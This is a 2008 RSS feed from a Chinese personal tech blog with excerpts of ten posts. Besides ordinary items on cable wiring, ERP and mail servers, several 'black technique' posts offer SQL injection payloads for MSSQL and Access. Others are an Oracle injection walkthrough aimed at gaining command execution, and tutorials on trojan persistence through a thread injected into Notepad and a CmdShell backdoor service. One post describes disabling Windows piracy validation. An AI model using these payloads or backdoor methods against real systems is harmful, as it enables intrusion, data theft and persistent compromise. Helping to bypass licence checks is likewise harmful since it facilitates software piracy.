<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:wfw="http://wellformedweb.org/CommentAPI/">
  <channel>
    <title><![CDATA[梦游网络]]></title> 
    <link>http://www.skyty.com.cn/</link> 
    <description><![CDATA[一个梦想，一片天空]]></description> 
    <language>zh-cn</language> 
    <copyright><![CDATA[Copyright 2008, 梦游网络]]></copyright> 
    <webMaster><![CDATA[huanglin20042004@163.com (天涯)]]></webMaster> 
    <generator>LBS v2.0.313</generator> 
    <pubDate>Fri, 21 Nov 2008 10:01:20 +0800</pubDate> 
    <ttl>60</ttl>
  
    <item>
      <title><![CDATA[10M 100M 1000M网线的做法]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=55]]></link> 
      <category><![CDATA[网管记录]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Thu, 20 Nov 2008 09:09:05 +0800</pubDate> 
      <description><![CDATA[我们一般用五类双绞线来作十兆和百兆的网线，一个网线中有四对共八根细线组成。当水晶头（RJ45头）金属片面对我们的时候从左至右引脚序号是1-8，这序号做网络联线时非常重要，不能搞错。<br />     EIA/TIA的布线标准中规定了两种双绞线的线序568A与568B。<br /><br /><span style="color:Red">标准568A：绿白--1，绿--2，橙白--3，蓝--4，蓝白--5，橙--6，棕白--7，棕--8；<br />标准568B：橙白--1，橙--2，绿白--3，蓝--4，蓝白--5，绿--6，棕白--7，棕--8。</span><br />      那么两标准具体如何应用，都用在哪些设备上呢？我们平时做的线直连线比较多，有人也叫直通线，即两头都成586A的标准，而交叉线则在一头做成586A另一头做成586B标准。一般来说，路由器和PC，或者Switch和PC，或者HUB和PC都用直连线。而Switch级联或者HUB级联或者]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=55]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[内部控制与ERP管理系统]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=54]]></link> 
      <category><![CDATA[网管记录]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Fri, 07 Nov 2008 14:43:03 +0800</pubDate> 
      <description><![CDATA[企业所面临的风险而言，企业仍需要通过建立内部控制体系，提高风险管理水平，规避和弱化企业经营管理过程中遇到的各类风险 <br />　　 <br />　　许多企业为了适应国际化和市场化的要求，纷纷建立自己的内部控制体系和应用ERP管理系统，这两个体系都是涉及面广、规模浩大、费用高昂的项目。那么这两者之间到底是什么关系，有什么异同，是否可以相互替代或互为补充，这是本文要探讨和希望解决的问题。 <br />　　 <br />　　一、内部控制简介 <br />　　 <br />　　1.内部控制的概念 <br />　　控制可以分成内部控制和外部控制，外部控制是指通过企业所处的外部环境（比如影响企业外部活动的法律、法规、历史文化和社会意识形态等企业自身功能不能左右的因素）对企业经营活动的约束和规范；而内部控制则是指企业为了实现自己的既定目标而进行的自身内部的自我组织、自我调节和自我修正。 <br />　　对内部控制的认识是随着时间和环境的变化而逐步成熟完善起来的。企业内外部环境的不]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=54]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[用Win 2003架设邮件服务器]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=53]]></link> 
      <category><![CDATA[网管记录]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Wed, 05 Nov 2008 17:04:16 +0800</pubDate> 
      <description><![CDATA[一、安装POP3和SMTP服务组件<br /><br />　　Windows Server 2003默认情况下是没有安装POP3和SMTP服务组件的，因此我们要手工添加。<br /><br />　　1.安装POP3服务组件<br /><br />　　以系统管理员身份登录Windows Server 2003 系统。依次进入“控制面板→添加或删除程序→添加/删除Windows组件”，在弹出的“Windows组件向导”对话框中选中“电子邮件服务”选项，点击“详细信息”按钮，可以看到该选项包括两部分内容：POP3服务和POP3服务Web管理。为方便用户远程Web方式管理邮件服务器，建议选中“POP3服务Web管理”。<br /><br />　　2.安装SMTP服务组件<br /><br />　　选中“应用程序服务器”选项，点击“详细信息”按钮，接着在“Internet信息服务（IIS）”选项中查看详细信息，选中“SMTP Service”选项，最后点击“确定”按钮。此外，如果用户需要对邮件服务]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=53]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[常用注入命令]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=52]]></link> 
      <category><![CDATA[黑色技术]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Thu, 23 Oct 2008 11:53:03 +0800</pubDate> 
      <description><![CDATA[//看看是什么权限的<br />and 1=(Select IS_MEMBER(’db_owner’))<br />And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--<br /><br />//检测是否有读取某数据库的权限<br />and 1= (Select HAS_DBACCESS(’master’))<br />And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 --<br /><br />数字类型<br />and char(124)%2Buser%2Bchar(124)=0<br /><br />字符类型<br />’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’<br /><br />搜索类型<br />’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=52]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[oracle 注入技术]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=51]]></link> 
      <category><![CDATA[黑色技术]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Mon, 20 Oct 2008 16:14:14 +0800</pubDate> 
      <description><![CDATA[介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。<br /><br />以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成<br /><br />/xxx.jsp?id=1 and &#39;1&#39;&lt;&gt;&#39;a&#39;||(select SYS.DBMS_EXPORT_EXTENSION.....)<br /><br />的形式即可。(用&quot; &#39;a&#39;|| &quot;是为了让语句返回true值)<br /><br />语句有点长，可能要用post提交。<br /><br />以下是各个步骤：<br /><br />1.创建包<br />通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：<br /><br />/xxx.jsp?id=1 and &#39;1&#39;&lt;&gt;&#39;a&#39;||(<br /><br />select SYS.DBMS_EXPOR]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=51]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[ACCESS注入]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=50]]></link> 
      <category><![CDATA[黑色技术]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Mon, 20 Oct 2008 14:49:16 +0800</pubDate> 
      <description><![CDATA[1.ACCESS<br />(1)数字型<br />判断数据库：<br />http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from msysobjects)<br />猜表名：<br />http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from 表名)<br /><br />猜列名：<br />http;//127.0.0.1/a.asp?id=7 and (select count(列名) from 表名)&gt;0<br /><br />猜值：<br />http;//127.0.0.1/a.asp?id=7 and (select top 1 asc(mid(列名,1,1)) from 表名)&gt;N<br /><br />猜字段数：<br />http;//127.0.0.1/a.asp?id=7 order by N<br /><br />UNION查询：<br />http;//127.0.0.1/a.asp?id=7 ]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=50]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[盗版系统避免10月20号后出现黑屏的解决方法]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=49]]></link> 
      <category><![CDATA[技术资料]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Sun, 19 Oct 2008 17:48:42 +0800</pubDate> 
      <description><![CDATA[盗版系统避免10月20号后出现黑屏的解决方法<br />微软将针对中国市场在本月20日启动Windows XP专业版及Office的正版验证计划，届时，安装了盗版Windows XP专业版的电脑将被强行每小时“黑屏”(桌面背景变为纯黑色)一次，Office的菜单栏将被添加“不是正版”的标记。 <br />避免此问题的方法 <br />1.我的电脑-属性-自动更新-关闭自动更新 <br />2.开始-运行（输入services.msc）—禁用Office Source Engine和Automatic Updates<br />或者<br />开始-运行-输入REGEDIT回车，在左边栏中找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\NotifyWgaLogon项<br /><br />　　将整个WgaLogon项删除即可。<br /><br /><span style="color:Red">一键恢复工具：</span><br />]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=49]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[木马线程守护]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=48]]></link> 
      <category><![CDATA[黑色技术]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Thu, 16 Oct 2008 23:07:43 +0800</pubDate> 
      <description><![CDATA[要防止自己的程序被关闭,通常有两种方法1.像IcesWord一样HOOK系统底层的函数2.使用线程保护。这里我们主要学习线程保护的方法<br />线程保护的思路就是让其它程序监视自己,如果自身程序退出了,那么监视程序就重新启动,这个过程我简单画了一个图如图1所示<br /><br />跟据图示1我们来分析一下线程守护的思路,并编程实现一个简单的线程守护程序，本程序完成的功能是把监视代码插入到Notepad.exe进程<br />以监视程序本身，如果自身被关闭，Notepad.exe进程将重新启动自身程序，以达到不死的效应,以下代码在VC6中编译通过<br /><br />现在我们重新整理一下思路，首先我们找一个其它进程做为我们的保护神并把自己进程的句柄传保护神，保护神通过用WaitForSingleObject<br />函数来检测句柄来判断要保护的进程是否结束，如果结束就重新启动我们的程序.跟据上面的思路我们来分析细节的实现<br /><br />1.检测并保护程序的远程线程代码<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=48]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[木马启动技术]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=47]]></link> 
      <category><![CDATA[黑色技术]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Thu, 16 Oct 2008 23:00:27 +0800</pubDate> 
      <description><![CDATA[随意打开一个木马的服务生成端，你都能发现里面有一种启动方式叫“服务启动”,也就是说这个技术以经是大众化的了,但是你写过这样的<br />程序吗？如果写过的话，你就可以泡杯茶先休息一下，如果还不是太了解的话，那就一块来学习一下<br /><br />通常编写一个服务需要两个程序，一个是实现功能的Service程序，一个是用于对Service程序进行控制的控制程序。这里需要注意的是实现<br />Service功能的程序与一般的程序是有区别的,其区别并不仅仅在于是不是有GUI窗体，在其格式上也有着不同，下面我们先写一个CmdShell<br />后门的Service程序。<br /><br />对于Service程序来说，它一般又由以下四部分组成：main(),ServiceMain（）和Handler（）当然还有我们的功能实现函数比如MyWork()<br />它们之间的关系，用一个简单的图示就可以了然于胸了如图示1,其服务程序的基本流程就是由main()调用ServiceMain()而由ServiceMain()<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=47]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[木马启动技术]]></title> 
      <link><![CDATA[http://www.skyty.com.cn/article.asp?id=46]]></link> 
      <category><![CDATA[黑色技术]]></category> 
      <author><![CDATA[天涯 <null@null.com>]]></author> 
      <pubDate>Thu, 16 Oct 2008 23:00:27 +0800</pubDate> 
      <description><![CDATA[随意打开一个木马的服务生成端，你都能发现里面有一种启动方式叫“服务启动”,也就是说这个技术以经是大众化的了,但是你写过这样的<br />程序吗？如果写过的话，你就可以泡杯茶先休息一下，如果还不是太了解的话，那就一块来学习一下<br /><br />通常编写一个服务需要两个程序，一个是实现功能的Service程序，一个是用于对Service程序进行控制的控制程序。这里需要注意的是实现<br />Service功能的程序与一般的程序是有区别的,其区别并不仅仅在于是不是有GUI窗体，在其格式上也有着不同，下面我们先写一个CmdShell<br />后门的Service程序。<br /><br />对于Service程序来说，它一般又由以下四部分组成：main(),ServiceMain（）和Handler（）当然还有我们的功能实现函数比如MyWork()<br />它们之间的关系，用一个简单的图示就可以了然于胸了如图示1,其服务程序的基本流程就是由main()调用ServiceMain()而由ServiceMain()<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.skyty.com.cn/feed.asp?q=comment&id=46]]></wfw:commentRss>
    </item>
      
  </channel>
</rss>
